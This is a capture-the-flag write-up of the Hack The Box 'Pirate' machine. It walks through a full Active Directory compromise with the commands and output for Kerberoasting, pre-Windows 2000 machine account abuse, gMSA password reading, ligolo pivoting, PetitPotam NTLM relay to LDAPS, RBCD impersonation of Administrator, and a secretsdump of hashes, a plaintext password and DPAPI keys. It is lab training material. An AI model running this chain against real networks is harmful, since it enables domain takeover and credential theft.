> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-season-10/htb-pirate.md).

# HTB - Pirate

## Enumeration and Foothold

### NMAP

```bash
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-08-13 23:47:08Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```

add the domain name to the hosts file `/etc/hosts`

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0WXMux3DfMrlQIrHlVOA%2Fimage.png?alt=media&amp;token=6445adea-ec10-4751-8f28-faaafd44dd15" alt=""><figcaption></figcaption></figure>

Nothing interesting on port 80.

### SMB

We are given credentials to complete the assessment.

`pentest / p3nt3st2025!&`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6vxdg2527cV682dp2KdG%2Fimage.png?alt=media&amp;token=59ff372a-07fe-4b3a-bc7c-30804f7bda2d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FafBHEBw603y8V8A2HFNT%2Fimage.png?alt=media&amp;token=6451ae75-fe4a-474c-819a-284b35a9bcfa" alt=""><figcaption></figcaption></figure>

that said i will collect bloodhound data to inspect the permission and controls the extracted users have.

### Bloodhound

Sync the clock first to bypass skew errors.

```powershell
──(ajay㉿kali)-[~]
└─$ sudo ntpdate 10.129.244.95   
2026-08-13 23:59:37.659388 (+0000) +21322.408475 +/- 0.022065 10.129.244.95 s1 no-leap
CLOCK: time stepped by 21322.408475
```

```powershell
┌──(ajay㉿kali)-[~]
└─$ bloodyAD --host 10.129.244.95 -d pirate.htb -u pentest -p 'p3nt3st2025!&' get bloodhound
[+] Connecting to LDAP server
[+] Connected to LDAP serrver
Dumping schema: 2it [00:00,  8.36it/s]
Generating lookuptable: 87it [00:00, 143.79it/s]
Dumping SDs: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 91/91 [00:04<00:00, 19.04it/s]
Dumping domains: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00,  7.12it/s]
Dumping users: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 7/7 [00:00<00:00, 122.30it/s]
Dumping computers: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 6/6 [00:00<00:00, 119.09it/s]
Dumping groups: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 50/50 [00:00<00:00, 709.27it/s]
Dumping GPOs: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 41.86it/s]
Dumping OUs: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 21.86it/s]
Dumping Containers: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 20/20 [00:00<00:00, 274.86it/s]
[+] Bloodhound data saved to 20260814T000641_Bloodhound.zip
[+] Found 0 trusts
                    
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiV7xNxEDdZTbaiFeDsV6%2Fimage.png?alt=media&amp;token=8371b8a6-a00f-4cf3-972d-51868cf15b18" alt=""><figcaption></figcaption></figure>

looking for kerberoastable users found a user.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMcJ2O2Q5zwXiwuIwBcB0%2Fimage.png?alt=media&amp;token=61d64c69-e0c4-430c-a59e-00d366ae2c51" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FuyyaWertR6Gu7rnxxoks%2Fimage.png?alt=media&amp;token=587f6f66-c059-4fd0-9e4e-120fb76701bd" alt=""><figcaption></figcaption></figure>

this user has delegation rights on WEB01 computer.

That means a.white\_adm can request a service ticket on behalf of any user (including Domain Admins) to services running on WEB01, via the S4U2Self/S4U2Proxy Kerberos extension without needing that user's actual password.

That said i need to kerberoast the user and then proceed further.

#### Kerberoasting

```bash
┌──(ajay㉿kali)-[~]
└─$ impacket-GetUserSPNs pirate.htb/pentest:'p3nt3st2025!&' -dc-ip 10.129.244.95 -request-user a.white_adm
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name         MemberOf                         PasswordLastSet             LastLogon                   Delegation  
--------------------  -----------  -------------------------------  --------------------------  --------------------------  -----------
ADFS/a.white          a.white_adm  CN=IT,CN=Users,DC=pirate,DC=htb  2026-01-16 00:36:34.388000  2025-06-09 16:03:37.380258  constrained 

[-] CCache file is not found. Skipping...
$krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb/a.white_adm*$b0943c4122b6f9c86581a5cef1bfc452$329f9912ef797b5c2d7e1c770d5b368060369dcd26f62aeac2480da22a0358e020126adb88b710f93afae6660afe9d36c02096f85ac5d72615dc7aee71ae1e85096018a0f40ac601084e6e2da153d5c7042a99d677d04af483dfb86f51e005a15a1bcf1d2a781a43bc5a5cdfa80022c91ca5b58d0ff043e2b98a4aa8e40f623ee863bebfb379f1c9ccc5c60e5595b1b5ee8f15f52d1fad37c2c5e754dbbce923c82d5892d50822e15ab3e3dcd1efb3652ec7e14aadf9ef97b97a77291724cf19e418f2d1298912ceaa35fe3502cd8081ddd53575dd0f0aa7f3e43900ac300468a95df0a4a397a2dcde84fa31978d76f7a04b8f759c44ed1c28760f0e1bdb2a3b3291443f5f5bfc826e802128f7972675dec10a468f7a8835f5fa57742932d756246c094904f566a528d72c7f0d6e0abebc68769e1cdd8c6ecd3a89c964d34e36ac6329a29419c88b9f6604a090f8180f0cc107977b619527e797c88f89c89c317df80534d44103690b00bc4bc4a4ad0569f4a7f8c39ca7cf4e646b310464dd606d99c0cd816b7d80657e38f69334348f277b643a46df283be6fee9515d0b95745f0161b84a641bada705dff5aa02d3537a87f0125e645e3cb25bc259a1b64d4fc9a412bf9b4a6a75028ba258c6a058cd2d3be651df8bcf0ad49102a50718177179a49309dafc6b9f4b49bb8e6e2b10b17f851746ce7a8b965ef33ac3cf063f4172e9b8a391f2a688c1c5fe4adc58f061fa4e80b392e3a3f13982c041da39e3bda0c20bfa63019d1f155d2396702918e1d6ce86e7a7d00c8d208e480ad854e7457e2df8036914fb3be8891a8f89cc300ec8580d0bc4c0ff824d7dc8aeb5324047d1dc4c033a41ca80f3c30c8d8423d022c205c2292eb1953e86d374e5610ddecd4f2a2a801bc8f2dc4eb1f782e9951fdd65ddc689f9e5e00fdbac11029d73d5a1d22b0753e6ccb4d2d66b6bbd6d2b84b9e41abc0661b0eb7a31f9251b345c9be73769fe31d6e22cf41ca0a4d6aef7f57cc87575d65dedf15891af35957bc2779036f964827f806ddffeddeb88cd337b1332714fdfeeec81f1aadf9ccc55670b503bd4662927fb1a497469da1244afda1ccf87dff8c1d96f7c71ada1b50e41c88017d71f6f0dd8097849d6a299cf2d47c747dc25c337605f8d627611ee893e60b163b287a39be85c88b89d39b91919bbce71a4f051cbaafa7b0076f8b9697210abed413d5f75d3f9c7b6dfa42ca27f7c4427d76be29c1887af8150558b1269d17f73734eb09af8edbc4517c140a5fbe0f5e8560996f6174f46b86e1eb242be11f4240dddda4c021226a22df7ec6a98bf19745122ba7addef72798a8d4ea43a15f3a1526f084866fa15019c5d56e07a47099e28aba3544011abccf27d9f93d061b2e54842fdbbcbce897d0a9926e986134917d507a08988c2375b4442334bc452deea56d41fbe1fef1c0641
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYgpDp72OYkknez81hjW7%2Fimage.png?alt=media&amp;token=026b2c76-de4c-4f89-9265-a01129479bab" alt=""><figcaption></figcaption></figure>

The hash was not able to crack with different wordlists or rules.

Enumerating for computer accounts that are part of Pre-windows 2000 compatible found this.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FalF8bz6LNGeLapWKzWlD%2Fimage.png?alt=media&amp;token=a29fe0a4-c741-4dfc-9779-6af79b13cb75" alt=""><figcaption></figcaption></figure>

That means the password of the computer account is set as lowercase on the computer name.

netexec have a module called pre2k for enumerating this.

### Enumerating Pre-Windows 2000 Machine Account

```bash
┌──(ajay㉿kali)-[~]
└─$ netexec ldap 10.129.244.95 -u pentest -p 'p3nt3st2025!&' -M pre2k
LDAP        10.129.244.95   389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP        10.129.244.95   389    DC01             [+] pirate.htb\pentest:p3nt3st2025!& 
PRE2K       10.129.244.95   389    DC01             Pre-created computer account: MS01$
PRE2K       10.129.244.95   389    DC01             Pre-created computer account: EXCH01$
PRE2K       10.129.244.95   389    DC01             [+] Found 2 pre-created computer accounts. Saved to /home/ajay/.nxc/modules/pre2k/pirate.htb/precreated_computers.txt
PRE2K       10.129.244.95   389    DC01             [+] Successfully obtained TGT for ms01@pirate.htb
PRE2K       10.129.244.95   389    DC01             [+] Successfully obtained TGT for exch01@pirate.htb
PRE2K       10.129.244.95   389    DC01             [+] Successfully obtained TGT for 2 pre-created computer accounts. Saved to /home/ajay/.nxc/modules/pre2k/ccache
```

The tgt of the machine accounts are obtained.

lets test them.

```bash
─(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=/home/ajay/.nxc/modules/pre2k/ccache/ms01.ccache           
                                                                                                                    
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.244.95 -k --use-kcache -d pirate.htb               
SMB         10.129.244.95   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.244.95   445    DC01             [+] pirate.htb\ms01 from ccache 
```

```bash
┌──(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=/home/ajay/.nxc/modules/pre2k/ccache/exch01.ccache    
                                                                                                                    
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.244.95 -k --use-kcache -d pirate.htb                 
SMB         10.129.244.95   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.244.95   445    DC01             [+] pirate.htb\exch01 from ccache 
```

Both of them work now i need to figure out which one to use for further access.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdtWAKP4ShCVuO8FKsQJe%2Fimage.png?alt=media&amp;token=a781eb48-21a0-4243-a801-2eb74e04470c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0vumuDGQOt3cY7smscvv%2Fimage.png?alt=media&amp;token=149d8f35-126a-4eaa-a428-957328229701" alt=""><figcaption></figcaption></figure>

MS01 is part of an interesting group called Domain Secure Servers.

EXCH01 is not part of any other interesting directories that said i will use MS01.

That said i can use bloodyAD to see what permissions ms01 have as the bloodhound data collected as pentest did not give any significant permissions of MS01. so i will manually enumerate permissions.

```bash
──(ajay㉿kali)-[~]
└─$ bloodyAD --host dc01.pirate.htb --dc-ip 10.129.244.95 -d pirate.htb -k get object 'MS01$' --attr memberOf

distinguishedName: CN=MS01,CN=Computers,DC=pirate,DC=htb
memberOf: CN=Domain Secure Servers,CN=Users,DC=pirate,DC=htb; CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=pirate,DC=htb
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FinFBCqXQHEOfowLv1ccF%2Fimage.png?alt=media&amp;token=b69a2680-053c-4686-b7ff-4dcdf5e3d264" alt=""><figcaption></figcaption></figure>

`msDS-GroupManagedServiceAccount: CREATE_CHILD` on MS01 means you may have permission to create a gMSA object as a child of that computer object.

Its also worth checking if we are able to read any gmsa passwords.

```bash
┌──(ajay㉿kali)-[~]
└─$ netexec ldap DC01.pirate.htb -k --use-kcache --gmsa
LDAP        DC01.pirate.htb 389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:PIRATE.HTB) (signing:None) (channel binding:Never)
LDAP        DC01.pirate.htb 389    DC01             [+] PIRATE.HTB\ms01 from ccache 
LDAP        DC01.pirate.htb 389    DC01             [*] Getting GMSA Passwords
LDAP        DC01.pirate.htb 389    DC01             Account: gMSA_ADCS_prod$      NTLM: 1430191bce4f3731edd34d8c24a56c23     PrincipalsAllowedToReadPassword: Domain Secure Servers
LDAP        DC01.pirate.htb 389    DC01             Account: gMSA_ADFS_prod$      NTLM: bb510d80e8ed89f4cc81a1f1d374e164     PrincipalsAllowedToReadPassword: Domain Secure Servers
```

Found gmsa passwords.

`ms01` is authorized, directly or through membership, to retrieve the gMSA managed passwords.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FL5QV6HH9sPM2zhrYbLD0%2Fimage.png?alt=media&amp;token=c198514e-e1cf-4f1e-ad45-0f90c8a670ff" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F5IfA9noZ5KRQdw7JdnCd%2Fimage.png?alt=media&amp;token=c5c2b9c2-9fae-41c0-ace5-3f70ad23d6dd" alt=""><figcaption></figcaption></figure>

Can winrm to both the machines.

## Shell as GMSA\_ADFS\_PROD

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXIT0AUu7xW2oj0b0LQVV%2Fimage.png?alt=media&amp;token=e612026c-1263-4528-b5cf-93b6ec940ea6" alt=""><figcaption></figcaption></figure>

I will collect bloodhound data again which can reveal anything that is missed earlier.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPPEpi1DAJzC0Qvks54gE%2Fimage.png?alt=media&amp;token=9e67ff0e-ff8d-4607-b3ac-0e8cc4dc5228" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwwnL9cZRcUhOQzfxgj1N%2Fimage.png?alt=media&amp;token=e3f6c2e4-114d-4227-b821-bfb5935fea2f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrGHbB8Mp1UnuvwrCeGsm%2Fimage.png?alt=media&amp;token=72a803ce-c21d-42c8-a1af-519752561433" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWYkm43oWVqXkPU0qR0Ye%2Fimage.png?alt=media&amp;token=a5394d2c-33e1-4143-872b-5bf73e18cd13" alt=""><figcaption></figcaption></figure>

so the permission to read is basically inherited from the group.

Also enumerated the winrm access reveals that DC01 is dual homed.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2SejTBPZ44hwiZBtTieO%2Fimage.png?alt=media&amp;token=4d8286c2-98f9-47d9-80ae-f9608eb1d179" alt=""><figcaption></figcaption></figure>

That said i run a ping sweep to identify the hosts alive in the network.

```powershell
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Desktop> 1..254|%{$ip="192.168.100.$_";if((New-Object Net.Sockets.TcpClient).ConnectAsync($ip,80).Wait(200)){"$ip UP"}}
192.168.100.2 UP
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Desktop> 
```

That said i am gonna use ligolo for making routes to the internal host.

### Pivoting via Ligolo

```powershell
──(ajay㉿kali)-[~/Tools/ligolo]
└─$ sudo ip tuntap add user $USER mode tun ligolo
[sudo] password for ajay: 
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~/Tools/ligolo]
└─$ sudo ip link set ligolo up

──(ajay㉿kali)-[~/Tools/ligolo]
└─$ sudo ./proxy -selfcert -laddr 0.0.0.0:11601
```

```powershell
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Desktop> upload /home/ajay/Tools/ligolo/ligolo-ng_agent_0.8.3_windows_amd64.exe
                                        
Info: Uploading /home/ajay/Tools/ligolo/ligolo-ng_agent_0.8.3_windows_amd64.exe to C:\Users\gMSA_ADFS_prod$\Desktop\ligolo-ng_agent_0.8.3_windows_amd64.exe
                                        
Data: 9736872 bytes of 9736872 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Desktop> 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNC1AdarFrW4SXvXywUv5%2Fimage.png?alt=media&amp;token=a8dd3d5d-4130-4bd0-86f3-06052d212125" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F5TCyf8mwbvS2a80Ad8PH%2Fimage.png?alt=media&amp;token=8517000e-046a-482c-a61d-82cb827499fa" alt=""><figcaption></figcaption></figure>

```powershell
┌──(ajay㉿kali)-[~]
└─$ sudo ip route add 192.168.100.0/24 dev ligolo
[sudo] password for ajay:                            
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fmq3ZLENJggskBkiH1VID%2Fimage.png?alt=media&amp;token=05f98b6b-3341-4e35-8cf4-da51a4ad3a29" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4ikbbw4TCPgjIUVAIMK6%2Fimage.png?alt=media&amp;token=38506fd4-d5b1-4b0b-a6d9-dadef14f3749" alt=""><figcaption></figcaption></figure>

Hostname of the machine is WEB01.

Also signing is false on WEB01 which means we can potentially use it for NTLM Relay Attacks.

first add web host to the hosts file.

```powershell
192.168.100.2  WEB01.pirate.htb web01.pirate.htb
```

But there's an important question: **what authentication can you cause to hit your relay listener?**

Having a shell on DC01 does not automatically give you a useful NTLM relay source. You need a machine/account on the internal network to authenticate to you, and then relay that authentication to an appropriate service.\
domain is configured to allow up to **10 computer accounts per principal** under the normal MAQ mechanism.

```powershell
┌──(ajay㉿kali)-[~]
└─$ nxc ldap DC01.pirate.htb -k --use-kcache -M maq
LDAP        DC01.pirate.htb 389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:PIRATE.HTB) (signing:None) (channel binding:Never) 
LDAP        DC01.pirate.htb 389    DC01             [+] PIRATE.HTB\ms01 from ccache 
MAQ         DC01.pirate.htb 389    DC01             [*] Getting the MachineAccountQuota
MAQ         DC01.pirate.htb 389    DC01             MachineAccountQuota: 10
```

The attack vector consists of forcing a `WEB01$`to authenticate against Kali using **PetitPotam** (MS-EFSR), relay that authentication to `LDAPS`of the DC with ntlmrelayx**ntlmrelayx**, and configure **RBCD** to be able to impersonate users in WEB01.

The SMB signing is enabled in the DC, so we use `--remove-mic`and we target **LDAPS** instead of LDAP to avoid SASL binding conflict:

### NTLM Relay via Peti Potam

PetitPotam is being used to make **WEB01$ authenticate to your Kali listener**. Your relay then forwards that authentication to **DC01's LDAPS service**.

If the relayed `WEB01$` account has enough LDAP permissions, the relay can be used to `modifymsDS-AllowedToActOnBehalfOfOtherIdentity`:

`msDS-AllowedToActOnBehalfOfOtherIdentity` on a computer account.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FznHaXp3QxrqzxVa3GAXV%2Fimage.png?alt=media&amp;token=6049e037-e129-480d-898b-ec1b98bc107f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fe4aHWPMUXWJSdwECvKWH%2Fimage.png?alt=media&amp;token=eb560ebe-8aec-47e9-b1fc-3dfb15568e1c" alt=""><figcaption></figcaption></figure>

With the computer account created by ntlmrelayx we request a service ticket impersonating to Administratorat WEB01 via S4U2Proxy:

```bash
──(ajay㉿kali)-[~]
└─$ impacket-getST -spn cifs/WEB01.pirate.htb -impersonate Administrator \
  'pirate.htb/CDBCZPWA$:EWhE{rf>}I/6Tc>'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_WEB01.pirate.htb@PIRATE.HTB.ccache
                                                                            
```

```powershell
┌──(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=/home/ajay/Administrator@cifs_WEB01.pirate.htb@PIRATE.HTB.ccache
```

Now with the ticket i dump hashes.

```powershell
┌──(ajay㉿kali)-[~]
└─$ impacket-secretsdump -k -no-pass WEB01.pirate.htb -dc-ip 10.129.244.95
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x342dfe90cc4061078b79f011cd08f931
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b1aac1584c2ea8ed0a9429684e4fc3e5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:60da2d3ba00d6b5932e4c87dce6fa6b4:::
[*] Dumping cached domain logon information (domain/username:hash)
PIRATE.HTB/Administrator:$DCC2$10240#Administrator#8baf09ddc5830ac4456ee8639dd89644: (2026-02-25 02:41:09+00:00)
PIRATE.HTB/gMSA_ADFS_prod$:$DCC2$10240#gMSA_ADFS_prod$#66812dfee46ff41c9c8245a2819c3183: (2026-08-14 16:56:48+00:00)
PIRATE.HTB/a.white:$DCC2$10240#a.white#366c8924be3ea6d1d12825569a4bcc39: (2026-08-14 16:54:41+00:00)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
PIRATE\WEB01$:plain_password_hex:29f1505d87014b01b4317fed1d52ddbee2792a698e7e1de1bcdf29ab5d4b8e54828ce470d23491ba84e82d786622a821a14c730cf8610a32db1951b7619ee08c3bcacbab53aac8e052bd64e638c6bbd9529daacf04f86cfb9034808c4378d2c328c8c6afe7655f4a099dc41caeb6279c53313edcbd58db3e14490b7543ba3250ac200ec9834992b61b3f4319162645b50f402de4db0843fc43db7d54e04828abf86e490959bc88670e50f0b50373a3745f70039f8fd032435c4a725526957c7ae0dbaa81273b3aa28c0b029fea90c271b6601ef3ba7a05a13ec8c8ffd9999dd10eee87b4b9eb08a8a4af90710056f558
PIRATE\WEB01$:aad3b435b51404eeaad3b435b51404ee:feba09cf0013fbf5834f50def734bca9:::
[*] DefaultPassword 
PIRATE\a.white:E2nvAOKSz5Xz2MJu
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x01cffc2ef9a91d20107371f9a4a4112c892ed989
dpapi_userkey:0xa4fddb1b2df2db7cc3d044dc1b559bc1b45a1de9
[*] NL$KM 
 0000   A5 24 39 57 3F 8F 30 DC  61 F1 56 B7 B5 5C 0F 7C   .$9W?.0.a.V..\.|
 0010   6B 0A FF DF B0 A2 99 C3  68 A9 FE 15 E2 48 33 A9   k.......h....H3.
 0020   E9 8C 27 F8 8B 7C 05 55  4D FE 3C 5D 09 EA 9C 49   ..'..|.UM.<]...I
 0030   95 EB 7A 09 5B 48 7A 14  DC 74 E9 CB 7C 1A E0 8A   ..z.[Hz..t..|...
NL$KM:a52439573f8f30dc61f156b7b55c0f7c6b0affdfb0a299c368a9fe15e24833a9e98c27f88b7c05554dfe3c5d09ea9c4995eb7a095b487a14dc74e9cb7c1ae08a
[*] _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_a09ca32bc7cd2ce752ae0143bd203f0551564c04dd2846c4ed3e4e5a61cc9f11 
 0000   E3 EF 47 4B 98 13 8D D4  46 9F 6D C1 76 F8 79 BA   ..GK....F.m.v.y.
 0010   1E 08 17 BA 44 50 21 87  B9 08 0B 9F 33 34 C9 1B   ....DP!.....34..
 0020   9B 1A F1 CE 4E 91 FB 56  2C 8D 88 24 41 2C 70 0E   ....N..V,..$A,p.
 0030   00 D1 05 BC 67 4D 8E 26  A5 94 E3 DA 41 73 F2 C8   ....gM.&....As..
 0040   73 13 D6 34 B3 9C 34 12  D4 BF B6 84 92 47 68 6D   s..4..4......Ghm
 0050   F6 06 5B 53 65 66 80 7E  0A CE 92 F9 4E A3 16 6B   ..[Sef.~....N..k
 0060   B9 75 2D 12 D3 52 C8 9B  9F DA FA 7D 31 71 E4 DD   .u-..R.....}1q..
 0070   55 BE 9D 58 55 04 F8 C6  28 A0 FF 4C 67 0D 75 95   U..XU...(..Lg.u.
 0080   A9 09 A3 C9 A7 EC 2D FF  98 4E 5D DF 77 04 9A 91   ......-..N].w...
 0090   A5 59 7F 0A 39 C5 49 94  55 67 59 01 CC E4 1A DE   .Y..9.I.UgY.....
 00a0   D9 8D 80 A1 B5 F7 F8 2C  C2 20 B5 90 DF 4B FC 0B   .......,. ...K..
 00b0   FC 5F 0F EB 66 E7 3A 56  F1 AB 7F E9 14 C6 D7 CD   ._..f.:V........
 00c0   2B 83 E0 B9 06 5B 76 E0  2B C3 30 F7 69 44 16 F3   +....[v.+.0.iD..
 00d0   AC D6 C4 63 DF 84 92 35  00 B6 4A 10 14 E7 44 13   ...c...5..J...D.
 00e0   80 9A 7A 06 AF 57 7C E7  68 5B FD 2A B5 6A 20 67   ..z..W|.h[.*.j g
_SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_a09ca32bc7cd2ce752ae0143bd203f0551564c04dd2846c4ed3e4e5a61cc9f11:e3ef474b98138dd4469f6dc176f879ba1e0817ba44502187b9080b9f3334c91b9b1af1ce4e91fb562c8d8824412c700e00d105bc674d8e26a594e3da4173f2c87313d634b39c3412d4bfb6849247686df6065b536566807e0ace92f94ea3166bb9752d12d352c89b9fdafa7d3171e4dd55be9d585504f8c628a0ff4c670d7595a909a3c9a7ec2dff984e5ddf77049a91a5597f0a39c5499455675901cce41aded98d80a1b5f7f82cc220b590df4bfc0bfc5f0feb66e73a56f1ab7fe914c6d7cd2b83e0b9065b76e02bc330f7694416f3acd6c463df84923500b64a1014e74413809a7a06af577ce7685bfd2ab56a2067
